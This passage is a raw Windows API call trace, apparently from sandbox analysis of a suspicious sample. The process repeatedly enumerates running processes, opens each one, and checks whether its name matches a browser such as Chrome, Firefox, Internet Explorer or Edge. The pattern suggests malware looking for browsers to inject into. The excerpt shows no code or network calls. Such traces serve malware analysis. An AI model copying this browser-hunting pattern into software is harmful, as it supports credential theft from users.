	[0235.017] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0235.017] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.017] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0235.018] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0235.018] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc20) returned 0x751c
	[0235.018] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.018] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0235.019] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.019] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0235.019] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.019] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0235.020] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.020] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0235.020] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1
	[0235.025] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa80) returned 0x7520
	[0235.025] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.025] StrStrIA (lpFirst="dllhost.exe", lpSrch="chrome.exe") returned 0x0
	[0235.025] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.025] StrStrIA (lpFirst="dllhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0235.026] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.026] StrStrIA (lpFirst="dllhost.exe", lpSrch="firefox.exe") returned 0x0
	[0235.026] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.026] StrStrIA (lpFirst="dllhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0235.026] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0235.027] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb28) returned 0x7524
	[0235.027] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.027] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0235.028] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.028] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0235.028] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.028] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0235.028] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.028] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0235.028] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xda0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0235.029] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xda0) returned 0x7528
	[0235.029] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.029] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0235.030] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.030] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0235.031] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.031] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0235.031] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.031] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0235.032] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xda0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0
	[0235.032] CloseHandle (hObject=0x4fd0) returned 1
	[0235.032] Sleep (dwMilliseconds=0x64) 
	[0235.142] GetCurrentProcessId () returned 0x110
	[0235.142] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x4fd0
	[0235.147] Process32First (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0235.149] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0235.150] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0235.152] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x104) returned 0x752c
	[0235.152] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.152] StrStrIA (lpFirst="smss.exe", lpSrch="chrome.exe") returned 0x0
	[0235.153] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.153] StrStrIA (lpFirst="smss.exe", lpSrch="iexplore.exe") returned 0x0
	[0235.153] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.154] StrStrIA (lpFirst="smss.exe", lpSrch="firefox.exe") returned 0x0
	[0235.154] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.154] StrStrIA (lpFirst="smss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0235.154] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0235.156] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x148) returned 0x7530
	[0235.156] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.156] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0235.156] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.156] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0235.156] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.157] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0235.157] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.158] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0235.158] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0235.159] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x178) returned 0x7534
	[0235.159] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.159] StrStrIA (lpFirst="wininit.exe", lpSrch="chrome.exe") returned 0x0
	[0235.159] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.159] StrStrIA (lpFirst="wininit.exe", lpSrch="iexplore.exe") returned 0x0
	[0235.159] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.159] StrStrIA (lpFirst="wininit.exe", lpSrch="firefox.exe") returned 0x0
	[0235.160] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.160] StrStrIA (lpFirst="wininit.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0235.160] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0235.161] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x184) returned 0x7538
	[0235.161] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.161] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0235.161] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.161] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0235.162] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.162] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0235.162] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.162] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0235.162] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0235.163] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1ac) returned 0x753c
	[0235.163] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.163] StrStrIA (lpFirst="winlogon.exe", lpSrch="chrome.exe") returned 0x0
	[0235.163] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.163] StrStrIA (lpFirst="winlogon.exe", lpSrch="iexplore.exe") returned 0x0
	[0235.164] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.164] StrStrIA (lpFirst="winlogon.exe", lpSrch="firefox.exe") returned 0x0
	[0235.164] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.164] StrStrIA (lpFirst="winlogon.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0235.164] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0235.165] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1d8) returned 0x7540
	[0235.165] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.165] StrStrIA (lpFirst="services.exe", lpSrch="chrome.exe") returned 0x0
	[0235.166] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.166] StrStrIA (lpFirst="services.exe", lpSrch="iexplore.exe") returned 0x0
	[0235.166] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.166] StrStrIA (lpFirst="services.exe", lpSrch="firefox.exe") returned 0x0
	[0235.166] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.166] StrStrIA (lpFirst="services.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0235.167] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0235.167] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e0) returned 0x7544
	[0235.167] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.167] StrStrIA (lpFirst="lsass.exe", lpSrch="chrome.exe") returned 0x0
	[0235.168] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.168] StrStrIA (lpFirst="lsass.exe", lpSrch="iexplore.exe") returned 0x0
	[0235.168] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.168] StrStrIA (lpFirst="lsass.exe", lpSrch="firefox.exe") returned 0x0
	[0235.168] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.168] StrStrIA (lpFirst="lsass.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0235.168] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0235.169] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e8) returned 0x7548
	[0235.169] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.169] StrStrIA (lpFirst="lsm.exe", lpSrch="chrome.exe") returned 0x0
	[0235.170] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.170] StrStrIA (lpFirst="lsm.exe", lpSrch="iexplore.exe") returned 0x0
	[0235.170] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.170] StrStrIA (lpFirst="lsm.exe", lpSrch="firefox.exe") returned 0x0
	[0235.170] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.170] StrStrIA (lpFirst="lsm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0235.170] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0235.171] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x250) returned 0x754c
	[0235.171] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.171] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0235.172] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.172] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0235.172] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.172] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0235.172] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.172] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0235.173] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0235.173] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x290) returned 0x7550
	[0235.173] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.173] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0235.174] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.174] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0235.174] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.174] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0235.174] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.174] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0235.175] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0235.175] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x2c4) returned 0x7554
	[0235.176] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.176] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0235.176] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.176] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0235.176] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.176] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0235.177] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.177] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0235.177] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0235.178] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x324) returned 0x7558
	[0235.178] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.178] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0235.178] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.178] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0235.178] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.178] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0235.179] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.179] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0235.179] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0235.180] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x34c) returned 0x755c
	[0235.180] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.180] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0235.180] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.180] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0235.180] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.180] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0235.181] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.181] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0235.181] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0235.182] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x3e4) returned 0x7560
	[0235.182] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.182] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0235.182] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.182] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0235.183] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.183] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0235.183] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.183] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0235.183] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0235.184] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x42c) returned 0x7564
	[0235.184] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.184] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0235.184] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.184] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0235.185] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.185] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0235.185] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.185] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0235.185] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0235.188] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4c8) returned 0x7568
	[0235.189] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.189] StrStrIA (lpFirst="spoolsv.exe", lpSrch="chrome.exe") returned 0x0
	[0235.189] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.189] StrStrIA (lpFirst="spoolsv.exe", lpSrch="iexplore.exe") returned 0x0
	[0235.189] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.189] StrStrIA (lpFirst="spoolsv.exe", lpSrch="firefox.exe") returned 0x0
	[0235.190] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.190] StrStrIA (lpFirst="spoolsv.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0235.190] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0235.191] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4f0) returned 0x756c
	[0235.191] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.191] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0235.191] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.191] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0235.191] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.191] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0235.192] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.192] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0235.192] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0235.193] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x54c) returned 0x7570
	[0235.193] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.193] StrStrIA (lpFirst="taskhost.exe", lpSrch="chrome.exe") returned 0x0
	[0235.193] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.193] StrStrIA (lpFirst="taskhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0235.193] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.193] StrStrIA (lpFirst="taskhost.exe", lpSrch="firefox.exe") returned 0x0
	[0235.194] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.194] StrStrIA (lpFirst="taskhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0235.194] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0235.195] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x590) returned 0x7574
	[0235.195] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.195] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0235.195] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.195] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0235.196] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.196] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0235.196] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.196] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0235.196] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0235.197] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xf0) returned 0x7578
	[0235.197] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0235.197] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0235.197] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
